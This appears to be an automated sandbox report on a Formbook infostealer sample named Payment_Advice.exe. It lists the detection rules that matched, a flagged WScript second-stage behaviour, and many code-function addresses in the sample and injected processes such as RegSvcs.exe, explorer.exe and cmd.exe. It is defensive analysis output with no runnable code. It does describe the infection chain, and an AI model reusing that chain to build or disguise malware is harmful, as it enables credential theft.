          Source: 0000000E.00000002.1647692265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: ewdbwwfpdh.bmp PID: 6052, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: RegSvcs.exe PID: 6108, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: cmd.exe PID: 636, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Initial sample is a PE file and has a suspicious name
          Source: initial sampleStatic PE information: Filename: Payment_Advice.exe
          Windows Scripting host queries suspicious COM object (likely to drop second stage)
          Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0050848E0_2_0050848E
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_00516CDC0_2_00516CDC
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_005040FE0_2_005040FE
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_005140880_2_00514088
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_005100B70_2_005100B7
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_005171530_2_00517153
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_005251C90_2_005251C9
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_005162CA0_2_005162CA
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_005032F70_2_005032F7
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_005143BF0_2_005143BF
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0052D4400_2_0052D440
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0050F4610_2_0050F461
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0050C4260_2_0050C426
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_005177EF0_2_005177EF
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0050286B0_2_0050286B
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0052D8EE0_2_0052D8EE
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_005319F40_2_005319F4
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0050E9B70_2_0050E9B7
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_00513E0B0_2_00513E0B
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0050EFE20_2_0050EFE2
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_00524F9A0_2_00524F9A
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001920076_2_00192007
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001980376_2_00198037
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_0018E0BE6_2_0018E0BE
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_0017E1A06_2_0017E1A0
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_0017225D6_2_0017225D
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001AA28E6_2_001AA28E
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001922C26_2_001922C2
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_0018C59E6_2_0018C59E
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001FC7A36_2_001FC7A3
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001AE89F6_2_001AE89F
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001E291A6_2_001E291A
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001A6AFB6_2_001A6AFB
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001D8B276_2_001D8B27
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_0019CE306_2_0019CE30
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001A71696_2_001A7169
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_002051D26_2_002051D2
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001792406_2_00179240
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001794996_2_00179499
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001917246_2_00191724
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_00191A966_2_00191A96
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_00179B606_2_00179B60
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_00197BAB6_2_00197BAB
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_00191D406_2_00191D40
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_00197DDA6_2_00197DDA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041E81C14_2_0041E81C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0040102F14_2_0040102F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0040103014_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0040120814_2_00401208
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041DB3B14_2_0041DB3B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041D56314_2_0041D563
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041DDCE14_2_0041DDCE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00402D8814_2_00402D88
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00402D9014_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041E5BB14_2_0041E5BB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00409E4F14_2_00409E4F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00409E5014_2_00409E50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041DF7D14_2_0041DF7D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041DF1B14_2_0041DF1B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00402FB014_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0176815814_2_01768158
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D010014_2_016D0100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0177A11814_2_0177A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017981CC14_2_017981CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017A01AA14_2_017A01AA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017941A214_2_017941A2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0177200014_2_01772000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0179A35214_2_0179A352
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017A03E614_2_017A03E6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016EE3F014_2_016EE3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0178027414_2_01780274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017602C014_2_017602C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E053514_2_016E0535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017A059114_2_017A0591
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0179244614_2_01792446
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0178442014_2_01784420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0178E4F614_2_0178E4F6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E077014_2_016E0770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170475014_2_01704750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016DC7C014_2_016DC7C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016FC6E014_2_016FC6E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016F696214_2_016F6962
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E29A014_2_016E29A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017AA9A614_2_017AA9A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E284014_2_016E2840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016EA84014_2_016EA840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170E8F014_2_0170E8F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016C68B814_2_016C68B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0179AB4014_2_0179AB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01796BD714_2_01796BD7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016DEA8014_2_016DEA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0177CD1F14_2_0177CD1F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016EAD0014_2_016EAD00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016DADE014_2_016DADE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016F8DBF14_2_016F8DBF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E0C0014_2_016E0C00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D0CF214_2_016D0CF2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01780CB514_2_01780CB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01754F4014_2_01754F40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01700F3014_2_01700F30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01782F3014_2_01782F30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01722F2814_2_01722F28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016ECFE014_2_016ECFE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D2FC814_2_016D2FC8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0175EFA014_2_0175EFA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E0E5914_2_016E0E59
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0179EE2614_2_0179EE26
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0179EEDB14_2_0179EEDB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0179CE9314_2_0179CE93
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016F2E9014_2_016F2E90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017AB16B14_2_017AB16B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0171516C14_2_0171516C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016CF17214_2_016CF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016EB1B014_2_016EB1B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017970E914_2_017970E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0179F0E014_2_0179F0E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E70C014_2_016E70C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0178F0CC14_2_0178F0CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016CD34C14_2_016CD34C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0179132D14_2_0179132D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0172739A14_2_0172739A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017812ED14_2_017812ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016FB2C014_2_016FB2C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E52A014_2_016E52A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0179757114_2_01797571
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017A95C314_2_017A95C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0177D5B014_2_0177D5B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D146014_2_016D1460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0179F43F14_2_0179F43F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0179F7B014_2_0179F7B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0172563014_2_01725630
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017916CC14_2_017916CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E995014_2_016E9950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016FB95014_2_016FB950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0177591014_2_01775910
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0174D80014_2_0174D800
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E38E014_2_016E38E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0179FB7614_2_0179FB76
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01755BF014_2_01755BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0171DBF914_2_0171DBF9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016FFB8014_2_016FFB80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01753A6C14_2_01753A6C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0179FA4914_2_0179FA49
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01797A4614_2_01797A46
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0178DAC614_2_0178DAC6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01725AA014_2_01725AA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0177DAAC14_2_0177DAAC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01781AA314_2_01781AA3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01797D7314_2_01797D73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01791D5A14_2_01791D5A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E3D4014_2_016E3D40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016FFDC014_2_016FFDC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01759C3214_2_01759C32
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0179FCF214_2_0179FCF2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0179FF0914_2_0179FF09
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016A3FD214_2_016A3FD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016A3FD514_2_016A3FD5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0179FFB114_2_0179FFB1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E1F9214_2_016E1F92
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E9EB014_2_016E9EB0
          Source: C:\Windows\explorer.exeCode function: 15_2_1019603615_2_10196036
          Source: C:\Windows\explorer.exeCode function: 15_2_1018D08215_2_1018D082
          Source: C:\Windows\explorer.exeCode function: 15_2_1019491215_2_10194912
          Source: C:\Windows\explorer.exeCode function: 15_2_1018ED0215_2_1018ED02
          Source: C:\Windows\explorer.exeCode function: 15_2_1019A5CD15_2_1019A5CD
          Source: C:\Windows\explorer.exeCode function: 15_2_1019723215_2_10197232
          Source: C:\Windows\explorer.exeCode function: 15_2_10191B3015_2_10191B30
          Source: C:\Windows\explorer.exeCode function: 15_2_10191B3215_2_10191B32
          Source: C:\Windows\explorer.exeCode function: 15_2_1069D23215_2_1069D232
          Source: C:\Windows\explorer.exeCode function: 15_2_1069C03615_2_1069C036
          Source: C:\Windows\explorer.exeCode function: 15_2_1069308215_2_10693082
          Source: C:\Windows\explorer.exeCode function: 15_2_10697B3015_2_10697B30
          Source: C:\Windows\explorer.exeCode function: 15_2_10697B3215_2_10697B32
          Source: C:\Windows\explorer.exeCode function: 15_2_10694D0215_2_10694D02
          Source: C:\Windows\explorer.exeCode function: 15_2_1069A91215_2_1069A912
          Source: C:\Windows\explorer.exeCode function: 15_2_106A05CD15_2_106A05CD
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00A474B116_2_00A474B1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00A4540A16_2_00A4540A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00A44C1016_2_00A44C10
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00A5487516_2_00A54875
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00A6419116_2_00A64191
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00A4914416_2_00A49144
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00A6695A16_2_00A6695A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00A53EB316_2_00A53EB3
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00A55A8616_2_00A55A86
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00A6769E16_2_00A6769E
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00A54EC116_2_00A54EC1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00A47A3416_2_00A47A34
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00A4EE0316_2_00A4EE03
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00A63E6616_2_00A63E66
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00A4D66016_2_00A4D660
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00A46E5716_2_00A46E57
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00A50BF016_2_00A50BF0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00A46B2016_2_00A46B20
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00A5074016_2_00A50740
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_038503E616_2_038503E6
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0379E3F016_2_0379E3F0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0384A35216_2_0384A352
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_038102C016_2_038102C0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0383027416_2_03830274
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_038441A216_2_038441A2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_038501AA16_2_038501AA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_038481CC16_2_038481CC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0378010016_2_03780100
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0382A11816_2_0382A118
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0381815816_2_03818158
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0382200016_2_03822000
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0379077016_2_03790770
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037B475016_2_037B4750
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0378C7C016_2_0378C7C0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037AC6E016_2_037AC6E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0385059116_2_03850591
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0379053516_2_03790535
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0383E4F616_2_0383E4F6
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0383442016_2_03834420
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0384244616_2_03842446
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03846BD716_2_03846BD7
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0384AB4016_2_0384AB40
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0378EA8016_2_0378EA80
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037A696216_2_037A6962
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0385A9A616_2_0385A9A6
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037929A016_2_037929A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0379A84016_2_0379A840
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0379284016_2_03792840
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037BE8F016_2_037BE8F0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037768B816_2_037768B8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0380EFA016_2_0380EFA0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037B0F3016_2_037B0F30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037D2F2816_2_037D2F28
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0379CFE016_2_0379CFE0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03782FC816_2_03782FC8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03832F3016_2_03832F30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03804F4016_2_03804F40
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0384CE9316_2_0384CE93
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03790E5916_2_03790E59
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0384EEDB16_2_0384EEDB
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0384EE2616_2_0384EE26
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037A2E9016_2_037A2E90
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0379AD0016_2_0379AD00
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0378ADE016_2_0378ADE0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0382CD1F16_2_0382CD1F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037A8DBF16_2_037A8DBF
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03830CB516_2_03830CB5
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03790C0016_2_03790C00
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03780CF216_2_03780CF2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0377D34C16_2_0377D34C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0384132D16_2_0384132D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037D739A16_2_037D739A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_038312ED16_2_038312ED
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037AB2C016_2_037AB2C0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037952A016_2_037952A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0377F17216_2_0377F172
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_037C516C16_2_037C516C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0379B1B016_2_0379B1B0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0385B16B16_2_0385B16B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0383F0CC16_2_0383F0CC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0384F0E016_2_0384F0E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_038470E916_2_038470E9
